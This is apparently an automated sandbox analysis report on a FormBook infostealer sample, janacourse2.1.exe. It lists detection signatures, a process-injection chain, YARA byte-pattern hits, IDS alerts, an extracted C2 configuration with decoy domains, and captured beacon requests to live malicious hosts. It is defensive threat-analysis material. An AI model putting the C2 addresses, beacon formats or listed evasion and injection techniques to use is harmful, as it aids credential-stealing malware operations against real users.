Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
janacourse2.1.exe

Overview

General Information

Sample name:janacourse2.1.exe
Analysis ID:1586586
MD5:9746b0e34b3a2048074caf932a112cc1
SHA1:340bca56d23ea75d9e3e8e1e15b9a9bf8b051ef8
SHA256:346d6afdb252d251ce95155e05789adf73f55994f94687286dc4a0fa95327090
Tags:exeinfostealermalwaretrojanuser-Joker
Infos:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
Suricata IDS alerts for network traffic
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
AI detected suspicious sample
Binary is likely a compiled AutoIt script file
C2 URLs / IPs found in malware configuration
Found API chain indicative of sandbox detection
Machine Learning detection for sample
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Modifies the prolog of user mode functions (user mode inline hooks)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Writes to foreign memory regions
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality for read data from the clipboard
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to block mouse and keyboard input (often used to hinder debugging)
Contains functionality to call native functions
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to communicate with device drivers
Contains functionality to dynamically determine API calls
Contains functionality to execute programs as a different user
Contains functionality to launch a process as a different user
Contains functionality to launch a program with higher privileges
Contains functionality to modify clipboard data
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query CPU information (cpuid)
Contains functionality to read the PEB
Contains functionality to read the clipboard data
Contains functionality to retrieve information about pressed keystrokes
Contains functionality to shutdown / reboot the system
Contains functionality to simulate keystroke presses
Contains functionality to simulate mouse events
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Enables debug privileges
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
OS version to string mapping found (often used in BOTs)
Potential key logger detected (key state polling based)
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Sigma detected: Uncommon Svchost Parent Process
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • janacourse2.1.exe (PID: 7340 cmdline: "C:\Users\user\Desktop\janacourse2.1.exe" MD5: 9746B0E34B3A2048074CAF932A112CC1)
    • svchost.exe (PID: 7356 cmdline: "C:\Users\user\Desktop\janacourse2.1.exe" MD5: 1ED18311E3DA35942DB37D15FA40CC5B)
      • explorer.exe (PID: 2580 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
        • explorer.exe (PID: 7428 cmdline: "C:\Windows\SysWOW64\explorer.exe" MD5: DD6597597673F72E10C9DE7901FBA0A8)
          • cmd.exe (PID: 7456 cmdline: /c del "C:\Windows\SysWOW64\svchost.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
            • conhost.exe (PID: 7464 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
{"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
SourceRuleDescriptionAuthorStrings
00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpJoeSecurity_FormBook_1Yara detected FormBookJoe Security
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpWindows_Trojan_Formbook_1112e116unknownunknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cb90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b8f7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c8fa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
      • 0x18819:$sqlite3step: 68 34 1C 7B E1
      • 0x1892c:$sqlite3step: 68 34 1C 7B E1
      • 0x18848:$sqlite3text: 68 38 2A 90 C5
      • 0x1896d:$sqlite3text: 68 38 2A 90 C5
      • 0x1885b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x18983:$sqlite3blob: 68 53 D8 7F 8C
      Click to see the 33 entries
      SourceRuleDescriptionAuthorStrings
      1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        1.2.svchost.exe.400000.0.unpackJoeSecurity_FormBook_1Yara detected FormBookJoe Security
          1.2.svchost.exe.400000.0.unpackWindows_Trojan_Formbook_1112e116unknownunknown
          • 0x5451:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1bd90:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0x9bcf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x14ab7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
          1.2.svchost.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8b08:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x8d82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x148b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x143a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x149b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x14b2f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x979a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1361c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa493:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1aaf7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1bafa:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          1.2.svchost.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
          • 0x17a19:$sqlite3step: 68 34 1C 7B E1
          • 0x17b2c:$sqlite3step: 68 34 1C 7B E1
          • 0x17a48:$sqlite3text: 68 38 2A 90 C5
          • 0x17b6d:$sqlite3text: 68 38 2A 90 C5
          • 0x17a5b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x17b83:$sqlite3blob: 68 53 D8 7F 8C
          Click to see the 15 entries

          System Summary

          barindex
          Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ParentImage: C:\Users\user\Desktop\janacourse2.1.exe, ParentProcessId: 7340, ParentProcessName: janacourse2.1.exe, ProcessCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ProcessId: 7356, ProcessName: svchost.exe
          Source: Process startedAuthor: vburov: Data: Command: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\svchost.exe, NewProcessName: C:\Windows\SysWOW64\svchost.exe, OriginalFileName: C:\Windows\SysWOW64\svchost.exe, ParentCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ParentImage: C:\Users\user\Desktop\janacourse2.1.exe, ParentProcessId: 7340, ParentProcessName: janacourse2.1.exe, ProcessCommandLine: "C:\Users\user\Desktop\janacourse2.1.exe", ProcessId: 7356, ProcessName: svchost.exe
          TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
          2025-01-09T11:09:13.337078+010020314531Malware Command and Control Activity Detected192.168.2.449827185.53.179.9180TCP
          2025-01-09T11:09:54.469634+010020314531Malware Command and Control Activity Detected192.168.2.4500033.33.130.19080TCP

          Click to jump to signature section

          Show All Signature Results

          AV Detection

          barindex
          Source: http://www.ffgzgbl.xyz/hwu6/Avira URL Cloud: Label: malware
          Source: http://www.ffgzgbl.xyz/hwu6/www.suv-deals-49508.bondAvira URL Cloud: Label: malware
          Source: http://www.ffgzgbl.xyzAvira URL Cloud: Label: malware
          Source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.7b5846.online/hwu6/"], "decoy": ["lf758.vip", "locerin-hair.shop", "vytech.net", "pet-insurance-intl-7990489.live", "thepolithat.buzz", "d66dr114gl.bond", "suv-deals-49508.bond", "job-offer-53922.bond", "drstone1.click", "lebahsemesta57.click", "olmanihousel.shop", "piedmontcsb.info", "trisula888x.top", "66sodovna.net", "dental-implants-83810.bond", "imxtld.club", "frozenpines.net", "ffgzgbl.xyz", "tlc7z.rest", "alexismuller.design", "6vay.boats", "moocatinght.top", "hafwje.bond", "edmaker.online", "simo1simo001.click", "vbsdconsultant.click", "ux-design-courses-53497.bond", "victory88-pay.xyz", "suarahati7.xyz", "otzen.info", "hair-transplantation-65829.bond", "gequiltdesins.shop", "inefity.cloud", "jeeinsight.online", "86339.xyz", "stairr-lift-find.today", "wdgb20.top", "91uvq.pro", "energyecosystem.app", "8e5lr5i9zu.buzz", "migraine-treatment-36101.bond", "eternityzon.shop", "43mjqdyetv.sbs", "healthcare-software-74448.bond", "bethlark.top", "dangdut4dselalu.pro", "04506.club", "rider.vision", "health-insurance-cake.world", "apoppynote.com", "11817e.com", "hiefmotelkeokuk.top", "sugatoken.xyz", "aragamand.business", "alifewithoutlimits.info", "vibrantsoul.xyz", "olarpanels-outlet.info", "ozzd86fih4.online", "skbdicat.xyz", "cloggedpipes.net", "ilsgroup.net", "ptcnl.info", "backstretch.store", "maheshg.xyz"]}
          Source: janacourse2.1.exeVirustotal: Detection: 31%Perma Link
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.janacourse2.1.exe.1df0000.1.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000001.00000002.1707516393.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894349605.0000000004840000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707952623.0000000003240000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.1653240375.0000000001DF0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.1707975652.0000000003270000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2894297135.0000000004810000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.2893815730.00000000029D0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
          Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
          Source: janacourse2.1.exeJoe Sandbox ML: detected
          Source: janacourse2.1.exeStatic PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
          Source: Binary string: explorer.pdbUGP source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: wntdll.pdbUGP source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: wntdll.pdb source: janacourse2.1.exe, 00000000.00000003.1649968191.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, janacourse2.1.exe, 00000000.00000003.1650076305.0000000003E90000.00000004.00001000.00020000.00000000.sdmp, svchost.exe, svchost.exe, 00000001.00000003.1651592410.0000000003000000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1653270272.0000000003200000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.000000000359E000.00000040.00001000.00020000.00000000.sdmp, svchost.exe, 00000001.00000002.1708032120.0000000003400000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, explorer.exe, 00000003.00000003.1709728858.00000000048FF000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004AB0000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2894614878.0000000004C4E000.00000040.00001000.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.1708153894.0000000004713000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: explorer.pdb source: svchost.exe, 00000001.00000003.1706279740.0000000005400000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000001.00000003.1706921382.0000000005900000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2892144849.0000000000480000.00000040.80000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdb source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: Binary string: svchost.pdbUGP source: explorer.exe, 00000002.00000002.2903104637.0000000010F9F000.00000004.80000000.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.2893942362.0000000002D6C000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.2895259172.0000000004FFF000.00000004.10000000.00040000.00000000.sdmp
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102698F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_0102698F
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_010268EE FindFirstFileW,FindClose,0_2_010268EE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101D076 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0101D076
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101D3A9 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_0101D3A9
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102979D SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_0102979D
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01029642 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,0_2_01029642
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01029B2B FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_01029B2B
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0101DBBE lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_0101DBBE
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_01025C97 FindFirstFileW,FindNextFileW,FindClose,0_2_01025C97
          Source: C:\Windows\SysWOW64\svchost.exeCode function: 4x nop then pop edi1_2_00417D7F
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 4x nop then pop edi3_2_029E7D7F

          Networking

          barindex
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:49827 -> 185.53.179.91:80
          Source: Network trafficSuricata IDS: 2031412 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031449 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: Network trafficSuricata IDS: 2031453 - Severity 1 - ET MALWARE FormBook CnC Checkin (GET) : 192.168.2.4:50003 -> 3.33.130.190:80
          Source: C:\Windows\explorer.exeNetwork Connect: 185.53.179.91 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 3.33.130.190 80Jump to behavior
          Source: Malware configuration extractorURLs: www.7b5846.online/hwu6/
          Source: DNS query: www.ffgzgbl.xyz
          Source: global trafficHTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1Host: www.suv-deals-49508.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1Host: www.energyecosystem.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: Joe Sandbox ViewIP Address: 185.53.179.91 185.53.179.91
          Source: Joe Sandbox ViewIP Address: 3.33.130.190 3.33.130.190
          Source: Joe Sandbox ViewASN Name: TEAMINTERNET-ASDE TEAMINTERNET-ASDE
          Source: Joe Sandbox ViewASN Name: AMAZONEXPANSIONGB AMAZONEXPANSIONGB
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
          Source: C:\Users\user\Desktop\janacourse2.1.exeCode function: 0_2_0102CF1A InternetQueryDataAvailable,InternetReadFile,GetLastError,SetEvent,SetEvent,0_2_0102CF1A
          Source: global trafficHTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=CMKgcc8wmxxR7fJItHbMJ/VlsopyIdLojC2P8mirEdBvwXB60poQ/q0A3kD4/g2OcT4A HTTP/1.1Host: www.suv-deals-49508.bondConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /hwu6/?p0D=AfhLzLu&Dzr4T=WtJoisMWybjm7VngE64Vj/DeRFLELHs11aJdAXokC53izMeFLFxWUjGDd6P63up6AapE HTTP/1.1Host: www.energyecosystem.appConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficDNS traffic detected: DNS query: www.6vay.boats
          Source: global trafficDNS traffic detected: DNS query: www.ffgzgbl.xyz
          Source: global trafficDNS traffic detected: DNS query: www.suv-deals-49508.bond
          Source: global trafficDNS traffic detected: DNS query: www.imxtld.club
          Source: global trafficDNS traffic detected: DNS query: www.energyecosystem.app
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.com0
          Source: explorer.exe, 00000002.00000002.2896132549.00000000078AD000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1658360423.00000000078AD000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://ocsp.digicert.comhttp://crl3.digicert.com/DigiCertGlobalRootG2.crlhttp://crl4.digicert.com/Di
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.mi
          Source: explorer.exe, 00000002.00000002.2898200264.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000000.1664931071.000000000982D000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://schemas.micr
          Source: explorer.exe, 00000002.00000002.2897659949.0000000008720000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000002.2899099491.0000000009B60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000002.00000000.1660354222.0000000007F40000.00000002.00000001.00040000.00000000.sdmpString found in binary or memory: http://schemas.micro
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boats/hwu6/www.ffgzgbl.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.6vay.boatsReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.online/hwu6/www.suarahati7.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.7b5846.onlineReferer:
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.com/hwu6/www.victory88-pay.xyz
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.apoppynote.comReferer:
          Source: explorer.exe, 00000002.00000000.1658360423.00000000079B1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000002.00000002.2896132549.00000000079B1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top
          Source: explorer.exe, 00000002.00000002.2902277688.000000000CB7A000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://www.bethlark.top/hwu6/
